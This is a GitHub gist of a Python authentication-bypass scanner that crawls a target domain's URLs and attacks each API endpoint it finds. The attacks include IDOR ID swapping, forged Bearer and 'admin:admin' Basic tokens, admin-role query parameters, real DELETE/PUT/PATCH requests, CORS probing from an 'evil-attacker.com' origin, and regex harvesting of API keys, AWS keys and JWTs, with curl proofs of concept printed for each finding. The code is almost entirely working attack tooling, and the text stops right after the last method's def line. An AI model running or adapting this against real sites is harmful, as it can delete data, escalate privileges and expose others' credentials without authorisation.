Last active
May 23, 2025 16:06
-
-
Save nullenc0de/88e02e641ddd99bd1c49dcbd4f71c30a to your computer and use it in GitHub Desktop.
auth_bypass.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
Authentication Bypass Automation Tool v4 | |
Further false positive reduction | |
- Better HTML vs API response detection | |
- Improved JavaScript code filtering | |
- Skip logout endpoints | |
- Enhanced credential pattern validation | |
""" | |
import subprocess | |
import requests | |
import json | |
import re | |
import time | |
import argparse | |
from urllib.parse import urlparse, urljoin | |
from concurrent.futures import ThreadPoolExecutor, as_completed | |
import logging | |
from typing import List, Dict, Set | |
import urllib3 | |
# Disable SSL warnings and certificate verification warnings | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
requests.packages.urllib3.disable_warnings() | |
# Configure logging to suppress certificate warnings | |
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') | |
logger = logging.getLogger(__name__) | |
# Suppress specific certificate warnings | |
logging.getLogger("urllib3.connectionpool").setLevel(logging.ERROR) | |
logging.getLogger("requests.packages.urllib3").setLevel(logging.ERROR) | |
class AuthBypassTester: | |
def __init__(self, domain: str, threads: int = 10, timeout: int = 10): | |
self.domain = domain | |
self.threads = threads | |
self.timeout = timeout | |
self.session = requests.Session() | |
self.session.headers.update({ | |
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' | |
}) | |
# Disable SSL verification to avoid certificate warnings | |
self.session.verify = False | |
# Expanded response indicators for any API data that might control access | |
self.bypass_indicators = [ | |
# Authentication status | |
'authenticated', 'logged_in', 'isAuthenticated', 'user_authenticated', | |
'auth_status', 'login_status', 'authorized', 'session_valid', 'loggedIn', | |
# Access control | |
'access_granted', 'has_access', 'allowed', 'permitted', 'can_access', | |
'is_authorized', 'access_level', 'permission_granted', | |
# User status | |
'active', 'enabled', 'valid', 'verified', 'approved', 'confirmed', | |
'is_active', 'is_enabled', 'is_valid', 'is_verified', | |
# Subscription/License status | |
'subscribed', 'premium', 'licensed', 'paid', 'trial_expired', | |
'subscription_active', 'license_valid', 'account_active', | |
# Feature flags | |
'feature_enabled', 'beta_access', 'admin_access', 'demo_mode', | |
'maintenance_mode', 'read_only', 'restricted' | |
] | |
self.found_urls = set() | |
self.vulnerable_endpoints = [] | |
def run_urlfinder(self) -> List[str]: | |
"""Run URLfinder to discover URLs for the target domain""" | |
logger.info(f"Running URLfinder for domain: {self.domain}") | |
try: | |
# Run urlfinder with JSON output | |
cmd = ['urlfinder', '-d', self.domain, '-j', '-silent'] | |
result = subprocess.run(cmd, capture_output=True, text=True, timeout=600) | |
if result.returncode != 0: | |
logger.error(f"URLfinder failed: {result.stderr}") | |
return [] | |
urls = [] | |
for line in result.stdout.strip().split('\n'): | |
if line.strip(): | |
try: | |
data = json.loads(line) | |
urls.append(data['url']) | |
except json.JSONDecodeError: | |
# Handle non-JSON lines (might be regular output) | |
if line.startswith('http'): | |
urls.append(line.strip()) | |
logger.info(f"Found {len(urls)} URLs from URLfinder") | |
return urls | |
except subprocess.TimeoutExpired: | |
logger.error("URLfinder timed out after 10 minutes") | |
return [] | |
except FileNotFoundError: | |
logger.error("URLfinder not found. Make sure it's installed and in PATH") | |
return [] | |
def filter_api_endpoints(self, urls: List[str]) -> List[str]: | |
"""Filter URLs that are API endpoints (prioritized and filtered)""" | |
api_urls = [] | |
# Skip common false positive patterns (ENHANCED) | |
skip_patterns = [ | |
r'/wp-json/wp/v2/', | |
r'/job/\d+/', | |
r'\.js$', | |
r'\.css$', | |
r'/404\?', | |
r'/gtm\.js', | |
r'/gtm\.start', | |
r'noticeError/called', | |
r'\.(jpg|jpeg|png|gif|svg|ico|webp)(\?.*)?$', | |
r'\.(ttf|eot|woff|woff2|otf)(\?.*)?$', | |
r'\.(css|scss|less)(\?.*)?$', | |
r'\.pdf(\?.*)?$', | |
r'/images?/', | |
r'/fonts?/', | |
r'/static/', | |
r'/assets/', | |
r'/css/', | |
r'\.min\.(js|css)(\?.*)?$', | |
r'/demandware\.static/', | |
r'\.gif(\?.*)?$', | |
# Add patterns for common false positives | |
r'/configuration/modals/', # Modal configuration endpoints | |
r'/en_in/.*configuration/modals', # Localized modal configs | |
r'\.html?(\?.*)?$', # HTML files | |
r'/content/.*/configuration/', # CMS configuration paths | |
# Skip support/help center endpoints | |
r'support\.', # Support subdomains | |
r'help\.', # Help subdomains | |
r'/help_center/', # Help center paths | |
r'/support/', # Support paths | |
r'/hc/', # Help center abbreviated | |
r'/knowledge/', # Knowledge base | |
r'/kb/', # Knowledge base abbreviated | |
r'/faq/', # FAQ sections | |
r'/docs/', # Documentation | |
# Skip OAuth/auth endpoints (handled separately) | |
r'/oauth/authorize', | |
r'/auth/authorize', | |
r'/login\?', | |
r'/signin\?', | |
r'/account/login', | |
r'/user/login', | |
# Skip logout endpoints | |
r'/logout', | |
r'/signout', | |
r'/log-out', | |
r'/sign-out', | |
r'/account/logout', | |
r'/user/logout', | |
] | |
# High priority patterns (test these first) | |
priority_patterns = [ | |
r'/api/v\d+/', | |
r'/api/(?!.*/(gtm|noticeError))', | |
r'/v\d+/(?!.*wp)', | |
r'developers\.', | |
r'/apispecs/', | |
r'/graphql', | |
r'/rest/(?!.*wp)', | |
r'/oauth/', | |
r'/auth/', | |
r'/login/', | |
r'/user/', | |
r'/account/', | |
r'/session/', | |
r'/token/', | |
] | |
# Regular API patterns | |
regular_patterns = [ | |
r'/ajax/', | |
r'/services/', | |
r'/internal/', | |
r'/private/', | |
r'/admin/api/', | |
r'/backend/', | |
r'/secure/', | |
] | |
# First, collect high priority endpoints | |
priority_urls = [] | |
regular_urls = [] | |
for url in urls: | |
# Skip known false positive patterns | |
if any(re.search(pattern, url, re.IGNORECASE) for pattern in skip_patterns): | |
continue | |
# Additional filter: Skip if it looks like a static asset with parameters | |
if re.search(r'\.(jpg|png|gif|svg|ttf|woff|css)\?sw=|sh=|v=', url, re.IGNORECASE): | |
continue | |
# Check for high priority patterns | |
is_priority = any(re.search(pattern, url, re.IGNORECASE) for pattern in priority_patterns) | |
is_regular = any(re.search(pattern, url, re.IGNORECASE) for pattern in regular_patterns) | |
# Special handling for .well-known URLs | |
if '.well-known/' in url: | |
# Quick test to see if this returns HTML (indicating 404/error page) | |
try: | |
test_response = requests.get(url, timeout=5, verify=False) | |
if (test_response.status_code == 200 and | |
'application/json' in test_response.headers.get('content-type', '')): | |
is_priority = True | |
else: | |
continue # Skip - not JSON content | |
except: | |
continue # Skip if we can't test it | |
# Special handling for JSON files - only include if they're actually config files | |
elif url.endswith('.json'): | |
# Skip manifest.json files as they're meant to be public | |
if 'manifest.json' in url: | |
continue | |
# Include if it's in config or API directories | |
if any(keyword in url.lower() for keyword in ['config', 'api', 'jwks', 'settings']): | |
# But exclude if it's clearly in a static directory | |
if not any(static_dir in url.lower() for static_dir in ['static', 'assets', 'images', 'css', 'clientlibs']): | |
is_priority = True | |
else: | |
continue # Skip other JSON files | |
if is_priority: | |
priority_urls.append(url) | |
elif is_regular: | |
regular_urls.append(url) | |
# Combine with priority first, test all relevant endpoints | |
api_urls = priority_urls + regular_urls | |
# Remove duplicates while preserving order | |
seen = set() | |
filtered_api_urls = [] | |
for url in api_urls: | |
if url not in seen: | |
seen.add(url) | |
filtered_api_urls.append(url) | |
logger.info(f"Found {len(filtered_api_urls)} potential API endpoints (Priority: {len(priority_urls)}, Regular: {len(regular_urls)})") | |
logger.info(f"Filtered out static assets and non-API endpoints") | |
return filtered_api_urls | |
def is_meaningful_response(self, response: requests.Response) -> bool: | |
"""Check if response contains meaningful content (not just empty or error pages)""" | |
if not response or response.status_code >= 400: | |
return False | |
content = response.text.strip() | |
content_length = len(content) | |
# Empty or very short responses aren't meaningful | |
if content_length < 10: | |
return False | |
# Check if it's just an HTML error page | |
if content.lower().startswith('<!doctype html') or '<html' in content.lower()[:100]: | |
# Check for common error page indicators | |
error_indicators = ['404', 'not found', 'error', 'forbidden', 'unauthorized'] | |
if any(indicator in content.lower()[:500] for indicator in error_indicators): | |
return False | |
return True | |
def test_endpoint_bypass(self, url: str) -> Dict: | |
"""Test a single endpoint for multiple authentication bypass techniques""" | |
results = [] | |
try: | |
# Test 1: Response Manipulation (original technique) | |
response_manip = self.test_response_manipulation(url) | |
if response_manip['vulnerable']: | |
results.append(response_manip) | |
# Test 2: Missing Authentication | |
missing_auth = self.test_missing_authentication(url) | |
if missing_auth['vulnerable']: | |
results.append(missing_auth) | |
# Test 3: IDOR (parameter manipulation) | |
idor_test = self.test_idor_vulnerability(url) | |
if idor_test['vulnerable']: | |
results.append(idor_test) | |
# Test 4: Weak Token Validation (skip for public files) | |
if not any(public_file in url for public_file in ['manifest.json', '.well-known/', 'robots.txt']): | |
weak_token = self.test_weak_token_validation(url) | |
if weak_token['vulnerable']: | |
results.append(weak_token) | |
# Test 5: Privilege Escalation | |
priv_esc = self.test_privilege_escalation(url) | |
if priv_esc['vulnerable']: | |
results.append(priv_esc) | |
# Test 6: HTTP Method Access Control | |
method_bypass = self.test_http_method_bypass(url) | |
if method_bypass['vulnerable']: | |
results.append(method_bypass) | |
# Test 7: Information Disclosure | |
info_disclosure = self.test_information_disclosure(url) | |
if info_disclosure['vulnerable']: | |
results.append(info_disclosure) | |
# Test 8: CORS Misconfiguration | |
cors_test = self.test_cors_misconfiguration(url) | |
if cors_test['vulnerable']: | |
results.append(cors_test) | |
# Test 9: Error Message Analysis | |
error_analysis = self.test_error_message_disclosure(url) | |
if error_analysis['vulnerable']: | |
results.append(error_analysis) | |
if results: | |
return {'vulnerable': True, 'url': url, 'vulnerabilities': results} | |
else: | |
return {'vulnerable': False, 'url': url} | |
except Exception as e: | |
logger.debug(f"Error testing {url}: {e}") | |
return {'vulnerable': False, 'url': url, 'error': str(e)} | |
def test_response_manipulation(self, url: str) -> Dict: | |
"""Test 1: Response Manipulation Bypass""" | |
try: | |
# Skip OAuth endpoints - they're supposed to redirect | |
if any(oauth_pattern in url.lower() for oauth_pattern in ['/oauth/authorize', '/auth/authorize']): | |
return {'vulnerable': False} | |
response = self.session.get(url, timeout=self.timeout, allow_redirects=False) | |
# Check if it's a JSON API endpoint | |
if 'application/json' in response.headers.get('content-type', ''): | |
return self.test_json_manipulation(url, response) | |
# Check for redirect to SSO/login | |
if response.status_code in [301, 302, 303, 307, 308]: | |
location = response.headers.get('location', '') | |
# Only flag if it's protecting actual API/data endpoints, not OAuth flows | |
if (any(keyword in location.lower() for keyword in ['login', 'auth', 'sso', 'signin']) and | |
not any(skip in url.lower() for skip in ['/login', '/signin', '/auth/', '/oauth/'])): | |
return { | |
'vulnerable': True, | |
'method': 'Response Manipulation - Redirect Bypass', | |
'details': f'Protected endpoint redirects to authentication: {location}', | |
'exploitation': 'Intercept response and remove Location header or change status code to 200' | |
} | |
return {'vulnerable': False} | |
except Exception as e: | |
return {'vulnerable': False, 'error': str(e)} | |
def test_missing_authentication(self, url: str) -> Dict: | |
"""Test 2: Missing Authentication on Sensitive Endpoint""" | |
try: | |
# Skip common false positives | |
if any(pattern in url.lower() for pattern in [ | |
'wp-json/wp/v2/', '/job/', '/events/', 'manifest.json', | |
'/configuration/modals/', 'clientlibs', '/content/', | |
'/login', '/signin', '/oauth/', '/auth/authorize', | |
'support.', 'help.', '/help_center/', '/support/', | |
'/logout', '/signout', '/log-out', '/sign-out' | |
]): | |
return {'vulnerable': False} | |
# Test completely unauthenticated request | |
clean_session = requests.Session() | |
clean_session.verify = False | |
response = clean_session.get(url, timeout=self.timeout) | |
if response.status_code == 200 and self.is_meaningful_response(response): | |
content = response.text.lower() | |
# Skip if this is an HTML page (not an API response) | |
content_type = response.headers.get('content-type', '').lower() | |
if 'text/html' in content_type: | |
# For HTML pages, only check for very specific exposed secrets in script tags or meta tags | |
# Skip generic JavaScript code patterns | |
specific_html_patterns = [ | |
r'<meta[^>]+content=["\']([a-zA-Z0-9]{40,})["\']', # Meta tag with long token | |
r'window\.API_KEY\s*=\s*["\']([a-zA-Z0-9]{20,})["\']', # Explicitly set API key | |
r'data-api-key=["\']([a-zA-Z0-9]{20,})["\']', # Data attribute with API key | |
] | |
for pattern in specific_html_patterns: | |
match = re.search(pattern, response.text, re.IGNORECASE) | |
if match: | |
token = match.group(1) | |
# Validate it's not a placeholder | |
if not any(placeholder in token.lower() for placeholder in | |
['your-api-key', 'example', 'test', 'demo', 'xxx']): | |
return { | |
'vulnerable': True, | |
'method': 'Missing Authentication - Exposed API Key in HTML', | |
'details': f'Found exposed API key in HTML page', | |
'exploitation': 'Extract API key from HTML source', | |
'poc': f'curl -X GET "{url}" | grep -i "api[_-]key"', | |
'severity': 'HIGH' | |
} | |
return {'vulnerable': False} # Skip other checks for HTML pages | |
# For non-HTML responses (JSON, XML, etc.), use the original patterns | |
critical_patterns = [ | |
r'["\']?api[_-]?key["\']?\s*[:=]\s*["\']?([a-zA-Z0-9\-_]{20,})["\']?', | |
r'["\']?secret[_-]?key["\']?\s*[:=]\s*["\']?([a-zA-Z0-9\-_]{20,})["\']?', | |
r'["\']?access[_-]?token["\']?\s*[:=]\s*["\']?([a-zA-Z0-9\-_]{20,})["\']?', | |
r'["\']?private[_-]?key["\']?\s*[:=]\s*["\']?([a-zA-Z0-9\-_]{20,})["\']?', | |
r'["\']?password["\']?\s*[:=]\s*["\']?([^"\']{8,})["\']?', | |
r'["\']?jwt["\']?\s*[:=]\s*["\']?(eyJ[a-zA-Z0-9\-_=]+\.[a-zA-Z0-9\-_=]+\.[a-zA-Z0-9\-_=]*)["\']?', | |
r'["\']?bearer["\']?\s*[:=]\s*["\']?([a-zA-Z0-9\-_]{20,})["\']?' | |
] | |
# Check for actual pattern matches (not just keywords) | |
for pattern in critical_patterns: | |
matches = re.findall(pattern, response.text, re.IGNORECASE) | |
if matches: | |
for match in matches: | |
# Extract the actual secret value | |
secret_value = match if isinstance(match, str) else match[-1] | |
# Validate it's not a placeholder or JavaScript variable | |
if any(placeholder in secret_value.lower() for placeholder in | |
['your-api-key', 'example', 'test', 'demo', 'xxx', '...', | |
'placeholder', 'sample', 'dummy', 'fake', 'mock']): | |
continue | |
# Skip if it's too short or doesn't look like a real secret | |
if len(secret_value) < 10 or secret_value.isdigit() or secret_value.isalpha(): | |
continue | |
# Additional check: ensure we're not in a JavaScript function definition | |
# Get context around the match | |
match_pos = response.text.find(secret_value) | |
if match_pos > 0: | |
context_before = response.text[max(0, match_pos-50):match_pos] | |
if any(js_pattern in context_before for js_pattern in | |
['function', 'const ', 'let ', 'var ', '${', 'querySelector']): | |
continue | |
return { | |
'vulnerable': True, | |
'method': 'Missing Authentication - Critical Secret Exposure', | |
'details': f'Exposed secret in API response', | |
'exploitation': 'Direct access to sensitive credentials without authentication', | |
'poc': f'curl -X GET "{url}"', | |
'response_sample': response.text[:300] + '...' if len(response.text) > 300 else response.text, | |
'severity': 'CRITICAL' | |
} | |
# Check for API documentation exposure | |
if any(keyword in content for keyword in ['swagger', 'openapi', 'api-docs']) and len(content) > 1000: | |
return { | |
'vulnerable': True, | |
'method': 'Missing Authentication - API Documentation Exposure', | |
'details': 'API documentation accessible without authentication', | |
'exploitation': 'Access to complete API structure and endpoints', | |
'poc': f'curl -X GET "{url}"', | |
'severity': 'HIGH' | |
} | |
return {'vulnerable': False} | |
except Exception as e: | |
return {'vulnerable': False, 'error': str(e)} | |
def test_idor_vulnerability(self, url: str) -> Dict: | |
"""Test 3: Insecure Direct Object Reference (IDOR)""" | |
try: | |
# Look for numeric IDs in URL | |
id_patterns = [ | |
(r'/user/(\d+)', 'user'), | |
(r'/account/(\d+)', 'account'), | |
(r'/profile/(\d+)', 'profile'), | |
(r'/order/(\d+)', 'order'), | |
(r'/invoice/(\d+)', 'invoice'), | |
(r'/document/(\d+)', 'document'), | |
(r'[?&]id=(\d+)', 'id'), | |
(r'[?&]user=(\d+)', 'user'), | |
(r'[?&]uid=(\d+)', 'uid') | |
] | |
for pattern, param_type in id_patterns: | |
match = re.search(pattern, url) | |
if match: | |
original_id = match.group(1) | |
# Try different IDs | |
test_ids = [str(int(original_id) + 1), str(int(original_id) - 1), '1', '999'] | |
# Get baseline response | |
baseline_response = self.session.get(url, timeout=self.timeout) | |
if not self.is_meaningful_response(baseline_response): | |
continue | |
for test_id in test_ids: | |
if '?' in pattern or '&' in pattern: | |
test_url = re.sub(pattern, f'{pattern.split("=")[0]}={test_id}', url) | |
else: | |
test_url = url.replace(f'/{original_id}', f'/{test_id}') | |
response = self.session.get(test_url, timeout=self.timeout) | |
# Check if we got a different, meaningful response | |
if (response.status_code == 200 and | |
self.is_meaningful_response(response) and | |
response.text != baseline_response.text and | |
len(response.text) > 100): | |
# Additional check: response should contain user/account data | |
if any(indicator in response.text.lower() for indicator in | |
['email', 'name', 'phone', 'address', 'account', 'profile']): | |
return { | |
'vulnerable': True, | |
'method': f'IDOR (Insecure Direct Object Reference) - {param_type} parameter', | |
'details': f'Successfully accessed {param_type} ID {test_id} (original: {original_id})', | |
'exploitation': f'Change {param_type} ID to access other users\' data', | |
'poc': f'curl -X GET "{test_url}"' | |
} | |
return {'vulnerable': False} | |
except Exception as e: | |
return {'vulnerable': False, 'error': str(e)} | |
def test_weak_token_validation(self, url: str) -> Dict: | |
"""Test 4: Weak Session Token or Cookie Validation""" | |
try: | |
# Skip static assets and public files | |
static_extensions = r'\.(jpg|jpeg|png|gif|svg|ico|webp|ttf|eot|woff|woff2|css|js)(\?.*)?$' | |
public_files = ['manifest.json', 'robots.txt', '.well-known/', 'sitemap.xml'] | |
if (re.search(static_extensions, url, re.IGNORECASE) or | |
any(public_file in url for public_file in public_files)): | |
return {'vulnerable': False} | |
# Skip login/auth pages - they don't validate tokens | |
if any(pattern in url.lower() for pattern in ['/login', '/signin', '/oauth/', '/auth/', '/account/login', '/user/login', | |
'/logout', '/signout', '/customer/account', '/account/orders']): | |
return {'vulnerable': False} | |
# First test normal request to establish baseline | |
normal_response = self.session.get(url, timeout=self.timeout) | |
# Skip if baseline response is not meaningful or is HTML | |
if not self.is_meaningful_response(normal_response): | |
return {'vulnerable': False} | |
# Skip HTML pages - they often return same content regardless of auth | |
content_type = normal_response.headers.get('content-type', '').lower() | |
if 'text/html' in content_type: | |
return {'vulnerable': False} | |
# Test with invalid/tampered tokens | |
invalid_tokens = [ | |
'Bearer invalid_token_12345', | |
'Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.invalid_signature', | |
'Bearer admin_bypass_token', | |
'Basic YWRtaW46YWRtaW4=' # admin:admin in base64 | |
] | |
for token in invalid_tokens: | |
headers = {'Authorization': token} | |
response = self.session.get(url, headers=headers, timeout=self.timeout) | |
# Only flag as vulnerable if: | |
# 1. Returns 200 status | |
# 2. Response is meaningful | |
# 3. Response suggests successful authentication | |
if (response.status_code == 200 and | |
self.is_meaningful_response(response) and | |
len(response.text) > 50): | |
# Check if response indicates successful auth | |
auth_success_indicators = [ | |
'"authenticated":true', '"status":"success"', '"loggedIn":true', | |
'"user":{', '"profile":{', '"permissions":[', '"role":"' | |
] | |
if any(indicator in response.text for indicator in auth_success_indicators): | |
return { | |
'vulnerable': True, | |
'method': 'Weak Token Validation - Authentication Bypass', | |
'details': f'Server accepts invalid token and returns authenticated response', | |
'exploitation': 'Use any invalid token to bypass authentication', | |
'poc': f'curl -X GET "{url}" -H "Authorization: {token}"', | |
'response_sample': response.text[:200] + '...' if len(response.text) > 200 else response.text, | |
'severity': 'CRITICAL' | |
} | |
return {'vulnerable': False} | |
except Exception as e: | |
return {'vulnerable': False, 'error': str(e)} | |
def test_privilege_escalation(self, url: str) -> Dict: | |
"""Test 5: Privilege Escalation via Parameter Tampering""" | |
try: | |
# Skip if URL doesn't look like it handles user data | |
if not any(keyword in url.lower() for keyword in | |
['user', 'account', 'profile', 'admin', 'dashboard', 'panel', 'manage']): | |
return {'vulnerable': False} | |
# First get baseline response | |
baseline_response = self.session.get(url, timeout=self.timeout) | |
if not self.is_meaningful_response(baseline_response): | |
return {'vulnerable': False} | |
baseline_content = baseline_response.text.lower() | |
# Test with privilege escalation parameters | |
priv_params = [ | |
{'role': 'admin'}, | |
{'isAdmin': 'true'}, | |
{'is_admin': '1'}, | |
{'admin': '1'}, | |
{'userRole': 'administrator'}, | |
{'privilege': 'root'}, | |
{'access_level': '999'} | |
] | |
for params in priv_params: | |
response = self.session.get(url, params=params, timeout=self.timeout) | |
if response.status_code == 200 and self.is_meaningful_response(response): | |
content = response.text.lower() | |
# Check if response suggests elevated privileges | |
admin_gained_indicators = [ | |
'admin panel', 'administrator dashboard', 'system settings', | |
'user management', 'delete user', 'modify permissions', | |
'root access', 'superuser', '"role":"admin"', '"isAdmin":true' | |
] | |
# Check if we gained admin content that wasn't in baseline | |
admin_gained = any(indicator in content and indicator not in baseline_content | |
for indicator in admin_gained_indicators) | |
# Also check for significant content change | |
content_significantly_different = abs(len(content) - len(baseline_content)) > 500 | |
if admin_gained or (content_significantly_different and 'admin' in content): | |
return { | |
'vulnerable': True, | |
'method': 'Privilege Escalation via Parameter Tampering', | |
'details': f'Successfully escalated privileges using parameters: {params}', | |
'exploitation': 'Add privilege parameters to gain admin access', | |
'poc': f'curl -X GET "{url}?" + "&".join([f"{k}={v}" for k,v in params.items()])', | |
'response_sample': response.text[:300] + '...' if len(response.text) > 300 else response.text | |
} | |
return {'vulnerable': False} | |
except Exception as e: | |
return {'vulnerable': False, 'error': str(e)} | |
def test_http_method_bypass(self, url: str) -> Dict: | |
"""Test 6: Broken Access Control on HTTP Methods""" | |
try: | |
# Skip static assets and configuration endpoints | |
static_patterns = [ | |
r'\.(jpg|jpeg|png|gif|svg|ico|webp|ttf|eot|woff|woff2|css|js)(\?.*)?$', | |
r'/images/', r'/fonts/', r'/css/', r'/static/', r'/assets/', | |
r'/configuration/', r'/modals/', r'/content/' | |
] | |
if any(re.search(pattern, url, re.IGNORECASE) if pattern.endswith('$') else pattern in url.lower() | |
for pattern in static_patterns): | |
return {'vulnerable': False} | |
# Get baseline with GET request | |
get_response = self.session.get(url, timeout=self.timeout) | |
# Only test if GET returns meaningful content | |
if not self.is_meaningful_response(get_response): | |
return {'vulnerable': False} | |
get_content_length = len(get_response.text) | |
# Test dangerous methods | |
dangerous_methods = ['PUT', 'DELETE', 'PATCH'] | |
for method in dangerous_methods: | |
# Add test data for methods that accept body | |
test_data = None | |
if method in ['PUT', 'PATCH']: | |
test_data = json.dumps({'test': 'data'}) | |
headers = {'Content-Type': 'application/json'} | |
else: | |
headers = {} | |
response = self.session.request( | |
method, url, | |
data=test_data, | |
headers=headers, | |
timeout=self.timeout | |
) | |
# Only flag as vulnerable if: | |
# 1. Method returns success status | |
# 2. Response indicates actual processing (not just error page) | |
# 3. Response is different from GET (suggests method was processed) | |
if response.status_code in [200, 201, 202, 204]: | |
content = response.text.lower() | |
# Check for indicators of successful operation | |
success_indicators = [ | |
'success', 'updated', 'deleted', 'created', 'modified', | |
'saved', 'removed', '"status":200', '"ok":true' | |
] | |
error_indicators = [ | |
'error', 'forbidden', 'unauthorized', 'not allowed', | |
'access denied', 'permission denied', 'rejected' | |
] | |
has_success = any(indicator in content for indicator in success_indicators) | |
has_errors = any(indicator in content for indicator in error_indicators) | |
# For DELETE, 204 with no content is actually a success indicator | |
if method == 'DELETE' and response.status_code == 204: | |
return { | |
'vulnerable': True, | |
'method': f'HTTP Method Bypass - {method} (Destructive Operation)', | |
'details': f'{method} operation completed successfully (Status: 204 No Content)', | |
'exploitation': f'Use {method} method to delete resources without authorization', | |
'poc': f'curl -X {method} "{url}"', | |
'severity': 'HIGH' | |
} | |
# For other methods, check for success without errors | |
elif has_success and not has_errors: | |
return { | |
'vulnerable': True, | |
'method': f'HTTP Method Bypass - {method}', | |
'details': f'{method} method processed successfully (Status: {response.status_code})', | |
'exploitation': f'Use {method} method to modify resources without proper authorization', | |
'poc': f'curl -X {method} "{url}"' + (f' -d \'{test_data}\' -H "Content-Type: application/json"' if test_data else ''), | |
'response_sample': response.text[:200] + '...' if len(response.text) > 200 else response.text | |
} | |
return {'vulnerable': False} | |
except Exception as e: | |
return {'vulnerable': False, 'error': str(e)} | |
def test_information_disclosure(self, url: str) -> Dict: | |
"""Test 7: Exposed API Key or Token in Unauthenticated Requests""" | |
try: | |
# Skip login pages | |
if any(pattern in url.lower() for pattern in ['/login', '/signin', '/oauth/', '/auth/']): | |
return {'vulnerable': False} | |
response = self.session.get(url, timeout=self.timeout) | |
if not self.is_meaningful_response(response): | |
return {'vulnerable': False} | |
# Look for exposed secrets with better patterns | |
secret_patterns = [ | |
(r'["\']?api[_-]?key["\']?\s*[:=]\s*["\']([a-zA-Z0-9\-_]{20,})["\']', 'API Key'), | |
(r'["\']?secret[_-]?key["\']?\s*[:=]\s*["\']([a-zA-Z0-9\-_]{20,})["\']', 'Secret Key'), | |
(r'["\']?access[_-]?token["\']?\s*[:=]\s*["\']([a-zA-Z0-9\-_]{20,})["\']', 'Access Token'), | |
(r'["\']?private[_-]?key["\']?\s*[:=]\s*["\']([a-zA-Z0-9\-_]{20,})["\']', 'Private Key'), | |
(r'["\']?aws[_-]?access[_-]?key[_-]?id["\']?\s*[:=]\s*["\']([A-Z0-9]{20})["\']', 'AWS Access Key'), | |
(r'["\']?aws[_-]?secret[_-]?access[_-]?key["\']?\s*[:=]\s*["\']([a-zA-Z0-9/+=]{40})["\']', 'AWS Secret Key'), | |
(r'Bearer\s+([a-zA-Z0-9\-_=]+\.[a-zA-Z0-9\-_=]+\.[a-zA-Z0-9\-_=]*)', 'JWT Token'), | |
(r'Basic\s+([a-zA-Z0-9+/=]{20,})', 'Basic Auth Credentials'), | |
(r'["\']?client[_-]?secret["\']?\s*[:=]\s*["\']([a-zA-Z0-9\-_]{20,})["\']', 'OAuth Client Secret'), | |
(r'["\']?github[_-]?token["\']?\s*[:=]\s*["\']([a-zA-Z0-9]{40})["\']', 'GitHub Token'), | |
(r'["\']?stripe[_-]?key["\']?\s*[:=]\s*["\']([a-zA-Z0-9_]{24,})["\']', 'Stripe API Key') | |
] | |
found_secrets = [] | |
for pattern, secret_type in secret_patterns: | |
matches = re.findall(pattern, response.text, re.IGNORECASE) | |
if matches: | |
# Filter out obvious placeholders and common false positives | |
real_secrets = [] | |
for secret in matches: | |
# Skip placeholders | |
if any(placeholder in secret.lower() for placeholder in | |
['your-api-key', 'example', 'test', 'demo', 'xxx', '...', | |
'placeholder', 'sample', 'dummy', 'fake', 'mock']): | |
continue | |
# Skip repeated characters | |
if len(set(secret)) < 5: | |
continue | |
# Skip if it's just numbers or just letters (likely not a real key) | |
if secret.isdigit() or secret.isalpha(): | |
continue | |
real_secrets.append(secret) | |
if real_secrets: | |
found_secrets.extend([(secret_type, secret[:20] + '...') for secret in real_secrets]) | |
if found_secrets: | |
return { | |
'vulnerable': True, | |
'method': 'Information Disclosure - Exposed Secrets', | |
'details': f'Found {len(found_secrets)} exposed secrets in response', | |
'exploitation': 'Extract and use exposed API keys/tokens', | |
'poc': f'curl -X GET "{url}"', | |
'secrets_found': [f'{stype}: {svalue}' for stype, svalue in found_secrets[:3]], | |
'response_sample': response.text[:300] + '...' if len(response.text) > 300 else response.text, | |
'severity': 'CRITICAL' | |
} | |
return {'vulnerable': False} | |
except Exception as e: | |
return {'vulnerable': False, 'error': str(e)} | |
def test_cors_misconfiguration(self, url: str) -> Dict: | |
"""Test 8: CORS Misconfiguration""" | |
try: | |
# Skip non-API endpoints and support pages | |
if not any(pattern in url.lower() for pattern in ['api', 'ajax', 'json', 'rest', 'graphql']): | |
return {'vulnerable': False} | |
# Skip support/help endpoints which are meant to be public | |
if any(pattern in url.lower() for pattern in ['support.', 'help.', '/help_center/', '/support/']): | |
return {'vulnerable': False} | |
headers = {'Origin': 'https://evil-attacker.com'} | |
response = self.session.get(url, headers=headers, timeout=self.timeout) | |
# Only check successful responses with meaningful content | |
if not (response.status_code == 200 and self.is_meaningful_response(response)): | |
return {'vulnerable': False} | |
cors_header = response.headers.get('Access-Control-Allow-Origin', '') | |
cors_credentials = response.headers.get('Access-Control-Allow-Credentials', '') | |
# Check for overly permissive CORS | |
if cors_header == '*' or cors_header == 'https://evil-attacker.com': | |
# Additional check: is this actually sensitive data? | |
sensitive_content = any(indicator in response.text.lower() for indicator in [ | |
'password', 'token', 'secret', 'api_key', 'private', 'confidential', | |
'credit', 'ssn', 'email', 'phone', 'address', 'user_id', 'session' | |
]) | |
# Also check if response contains user-specific data patterns | |
user_data_patterns = [ | |
r'"user":\s*{', | |
r'"email":\s*"[^"]+@[^"]+"', | |
r'"profile":\s*{', | |
r'"account":\s*{', | |
r'"session":\s*"[^"]+"' | |
] | |
has_user_data = any(re.search(pattern, response.text) for pattern in user_data_patterns) | |
if sensitive_content or has_user_data or ('true' in cors_credentials.lower() and cors_header != '*'): | |
severity = 'CRITICAL' if cors_credentials.lower() == 'true' else 'HIGH' | |
return { | |
'vulnerable': True, | |
'method': 'CORS Misconfiguration', | |
'details': f'Allows unauthorized origin: {cors_header}' + | |
(f' with credentials' if cors_credentials.lower() == 'true' else ''), | |
'exploitation': 'Cross-origin data theft possible from malicious websites', | |
'poc': f'curl -X GET "{url}" -H "Origin: https://evil-attacker.com"', | |
'cors_header': cors_header, | |
'severity': severity | |
} | |
return {'vulnerable': False} | |
except Exception as e: | |
return {'vulnerable': False, 'error': str(e)} | |
def test_error_message_disclosure(self, url: str) -> Dict: | |
